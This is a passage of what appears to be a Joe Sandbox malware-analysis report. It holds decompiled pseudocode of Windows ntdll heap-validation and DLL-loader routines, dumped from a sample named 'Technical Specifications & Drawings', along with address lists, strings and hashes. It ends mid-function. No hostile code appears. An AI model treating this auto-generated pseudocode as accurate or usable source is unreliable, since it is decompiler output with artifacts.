				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E018649A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x1896378 = _t267;
						asm("int3");
						 *0x1896378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E017D174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E017AB150();
							} else {
								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E017AB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E017AB150();
							} else {
								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E017AB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x1896350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E017E9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E017D174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E017AB150();
										} else {
											E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E017AB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E017AB150();
									} else {
										E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E017AB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E017AB150();
								} else {
									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E017AB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E017AB150();
							} else {
								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01864AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0185FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E018523E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                  0x018644a1
                                                  0x018644a3
                                                  0x018644a7
                                                  0x018644ac
                                                  0x018644af
                                                  0x018644b2
                                                  0x018644b9
                                                  0x018644bc
                                                  0x018647f2
                                                  0x018647f2
                                                  0x018647f8
                                                  0x018647fc
                                                  0x018647fe
                                                  0x01864804
                                                  0x01864805
                                                  0x01864805
                                                  0x0186480c
                                                  0x01864810
                                                  0x01864812
                                                  0x01864812
                                                  0x01864812
                                                  0x01864822
                                                  0x01864822
                                                  0x01864827
                                                  0x01864827
                                                  0x00000000
                                                  0x01864827
                                                  0x018644c4
                                                  0x018644d3
                                                  0x018644d9
                                                  0x018644dc
                                                  0x018644de
                                                  0x018644e0
                                                  0x01864560
                                                  0x01864520
                                                  0x01864522
                                                  0x01864525
                                                  0x01864528
                                                  0x0186452b
                                                  0x0186452e
                                                  0x01864530
                                                  0x01864697
                                                  0x0186469d
                                                  0x018646a1
                                                  0x018646c0
                                                  0x018646c5
                                                  0x018646a3
                                                  0x018646b8
                                                  0x018646bd
                                                  0x018646cb
                                                  0x018646d4
                                                  0x01864677
                                                  0x01864677
                                                  0x01864679
                                                  0x0186467c
                                                  0x0186468a
                                                  0x01864690
                                                  0x01864690
                                                  0x018647f1
                                                  0x018647f1
                                                  0x018647f1
                                                  0x00000000
                                                  0x018647f1
                                                  0x01864536
                                                  0x01864539
                                                  0x0186453c
                                                  0x01864636
                                                  0x0186463c
                                                  0x01864640
                                                  0x0186465f
                                                  0x01864664
                                                  0x01864642
                                                  0x01864657
                                                  0x0186465c
                                                  0x01864670
                                                  0x00000000
                                                  0x01864542
                                                  0x01864542
                                                  0x01864546
                                                  0x01864548
                                                  0x0186454b
                                                  0x01864555
                                                  0x0186455b
                                                  0x0186455b
                                                  0x0186455b
                                                  0x0186455d
                                                  0x0186455d
                                                  0x0186455d
                                                  0x00000000
                                                  0x0186455d
                                                  0x0186453c
                                                  0x01864579
                                                  0x0186457c
                                                  0x01864587
                                                  0x01864589
                                                  0x01864591
                                                  0x01864592
                                                  0x01864597
                                                  0x01864598
                                                  0x018645a1
                                                  0x018645ab
                                                  0x018645ab
                                                  0x018645a1
                                                  0x018645ae
                                                  0x018645b4
                                                  0x018645b9
                                                  0x018645bd
                                                  0x01864759
                                                  0x01864759
                                                  0x0186475f
                                                  0x01864761
                                                  0x01864763
                                                  0x01864765
                                                  0x01864768
                                                  0x0186476b
                                                  0x0186476d
                                                  0x0186479c
                                                  0x0186479c
                                                  0x0186479f
                                                  0x018647a2
                                                  0x018647a4
                                                  0x01864830
                                                  0x01864833
                                                  0x01864879
                                                  0x0186487d
                                                  0x018648f1
                                                  0x018648f3
                                                  0x018648f3
                                                  0x00000000
                                                  0x018648f3
                                                  0x0186487f
                                                  0x01864885
                                                  0x01864887
                                                  0x018648a8
                                                  0x018648a8
                                                  0x018648ae
                                                  0x018648b0
                                                  0x018648dc
                                                  0x018648dc
                                                  0x018648dc
                                                  0x018648dc
                                                  0x018648ec
                                                  0x00000000
                                                  0x018648ec
                                                  0x018648b2
                                                  0x018648bc
                                                  0x018648be
                                                  0x018648c1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018648c3
                                                  0x018648c3
                                                  0x018648c6
                                                  0x018648c9
                                                  0x018648cc
                                                  0x018648d1
                                                  0x018648d4
                                                  0x00000000
                                                  0x00000000
                                                  0x018648d6
                                                  0x018648d7
                                                  0x018648da
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018648da
                                                  0x0186494f
                                                  0x01864955
                                                  0x01864959
                                                  0x01864978
                                                  0x0186497d
                                                  0x0186495b
                                                  0x01864970
                                                  0x01864975
                                                  0x01864986
                                                  0x01864987
                                                  0x0186498a
                                                  0x0186498d
                                                  0x01864997
                                                  0x018647ef
                                                  0x018647ef
                                                  0x018647ef
                                                  0x00000000
                                                  0x018647ef
                                                  0x01864890
                                                  0x01864890
                                                  0x01864891
                                                  0x01864891
                                                  0x01864894
                                                  0x01864897
                                                  0x0186489d
                                                  0x018648a0
                                                  0x00000000
                                                  0x00000000
                                                  0x018648a2
                                                  0x018648a3
                                                  0x018648a6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018648a6
                                                  0x018648fb
                                                  0x01864901
                                                  0x01864905
                                                  0x01864924
                                                  0x01864929
                                                  0x01864907
                                                  0x0186491c
                                                  0x01864921
                                                  0x0186492f
                                                  0x01864935
                                                  0x01864936
                                                  0x01864939
                                                  0x01864942
                                                  0x00000000
                                                  0x01864947
                                                  0x01864835
                                                  0x0186483b
                                                  0x0186483f
                                                  0x0186485e
                                                  0x01864863
                                                  0x01864841
                                                  0x01864856
                                                  0x0186485b
                                                  0x01864869
                                                  0x0186486c
                                                  0x0186486f
                                                  0x018647e7
                                                  0x018647e7
                                                  0x00000000
                                                  0x018647ec
                                                  0x018647aa
                                                  0x018647b0
                                                  0x018647b4
                                                  0x018647d3
                                                  0x018647d8
                                                  0x018647b6
                                                  0x018647cb
                                                  0x018647d0
                                                  0x018647de
                                                  0x018647df
                                                  0x018647e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0186476f
                                                  0x0186476f
                                                  0x01864778
                                                  0x01864785
                                                  0x01864787
                                                  0x0186478c
                                                  0x0186478e
                                                  0x00000000
                                                  0x00000000
                                                  0x01864790
                                                  0x01864792
                                                  0x01864794
                                                  0x00000000
                                                  0x00000000
                                                  0x01864796
                                                  0x01864799
                                                  0x00000000
                                                  0x01864799
                                                  0x00000000
                                                  0x018645c3
                                                  0x018645c3
                                                  0x018645c7
                                                  0x018645c7
                                                  0x018645ca
                                                  0x018645cf
                                                  0x018645d3
                                                  0x018645df
                                                  0x018645e4
                                                  0x018645e6
                                                  0x018645e8
                                                  0x018645ed
                                                  0x018645ed
                                                  0x018645f2
                                                  0x018645f2
                                                  0x018645f7
                                                  0x018645fc
                                                  0x01864602
                                                  0x01864606
                                                  0x01864609
                                                  0x0186460f
                                                  0x018646de
                                                  0x018646e3
                                                  0x018646e5
                                                  0x018646ec
                                                  0x018646ee
                                                  0x018646f6
                                                  0x018646f6
                                                  0x018646f6
                                                  0x018646f6
                                                  0x018646ec
                                                  0x01864615
                                                  0x01864615
                                                  0x0186461d
                                                  0x0186462e
                                                  0x0186462e
                                                  0x0186461d
                                                  0x0186460f
                                                  0x01864609
                                                  0x018646fd
                                                  0x00000000
                                                  0x00000000
                                                  0x01864710
                                                  0x0186471a
                                                  0x01864720
                                                  0x01864720
                                                  0x01864722
                                                  0x0186472c
                                                  0x00000000
                                                  0x0186472e
                                                  0x0186472e
                                                  0x00000000
                                                  0x0186472e
                                                  0x0186472c
                                                  0x01864738
                                                  0x0186473c
                                                  0x0186474b
                                                  0x01864751
                                                  0x01864751
                                                  0x00000000
                                                  0x0186473c
                                                  0x018648f4
                                                  0x018648f4
                                                  0x00000000
                                                  0x018648f4

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                  • API String ID: 0-1357697941
                                                  • Opcode ID: 07ed406b45f78e3022b847b2dfee71fef071da7fc8362b1852eef20ba4380ffc
                                                  • Instruction ID: 77e53e6ef560c13abbe6cbb29bf52a136730a1398401fb1c436bdab9cedfaa90
                                                  • Opcode Fuzzy Hash: 07ed406b45f78e3022b847b2dfee71fef071da7fc8362b1852eef20ba4380ffc
                                                  • Instruction Fuzzy Hash: 4EF1203160064AEFDB25DF69C484BAEFBF9FF49304F18812AE146DB641C734AA85CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D8E00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 44%
                                                  			E017D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x189d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1898464; // 0x761c0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1895780 & 0x00000003) != 0) {
							E01825510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1895780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E017EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1897984; // 0x1262b90
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1898464; // 0x761c0110
					 *0x189b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E017D9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1895780 & 0x00000005) != 0) {
						_push(_t49);
						E01825510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                  0x017d8e0f
                                                  0x017d8e16
                                                  0x017d8e19
                                                  0x017d8e1b
                                                  0x017d8e21
                                                  0x017d8e7f
                                                  0x017d8e85
                                                  0x01819354
                                                  0x0181936c
                                                  0x01819371
                                                  0x0181937b
                                                  0x01819381
                                                  0x01819381
                                                  0x0181937b
                                                  0x017d8e9d
                                                  0x017d8e9d
                                                  0x017d8e29
                                                  0x017d8e2c
                                                  0x017d8e38
                                                  0x017d8e3e
                                                  0x017d8e43
                                                  0x017d8eb5
                                                  0x017d8eb9
                                                  0x018192aa
                                                  0x018192af
                                                  0x018192e8
                                                  0x018192e8
                                                  0x018192af
                                                  0x017d8eb9
                                                  0x017d8e45
                                                  0x017d8e53
                                                  0x017d8e5b
                                                  0x017d8e5f
                                                  0x017d8e78
                                                  0x017d8e78
                                                  0x017d8e7d
                                                  0x017d8ec3
                                                  0x017d8ecd
                                                  0x017d8ed2
                                                  0x017d8ed2
                                                  0x017d8ec5
                                                  0x017d8ec5
                                                  0x00000000
                                                  0x017d8e7d
                                                  0x017d8e67
                                                  0x017d8ea4
                                                  0x0181931a
                                                  0x00000000
                                                  0x00000000
                                                  0x01819320
                                                  0x017d8ea4
                                                  0x017d8e70
                                                  0x01819325
                                                  0x01819340
                                                  0x01819345
                                                  0x01819345
                                                  0x017d8e76
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 01819357
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0181932A
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 0181933B, 01819367
                                                  • LdrpFindDllActivationContext, xrefs: 01819331, 0181935D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-3779518884
                                                  • Opcode ID: b4a3f68506b216ce7627fe94036e54d2160b8960c5379eb7b94d649ad0e13656
                                                  • Instruction ID: d7a02f92a7c4ed64a13030f36747a8d40bb3e1b05906b47a598ed36abd608f1a
                                                  • Opcode Fuzzy Hash: b4a3f68506b216ce7627fe94036e54d2160b8960c5379eb7b94d649ad0e13656
                                                  • Instruction Fuzzy Hash: 47412C72A4031DAFDB366A1CCC99A79F7B4BB09718F094569E50497151E7709E808FC3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017CA309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E017CA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x1898a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E017CA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E017CDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E017A9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E017AA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x1898748 - 1;
						if( *0x1898748 >= 1) {
							__eflags = _t262;
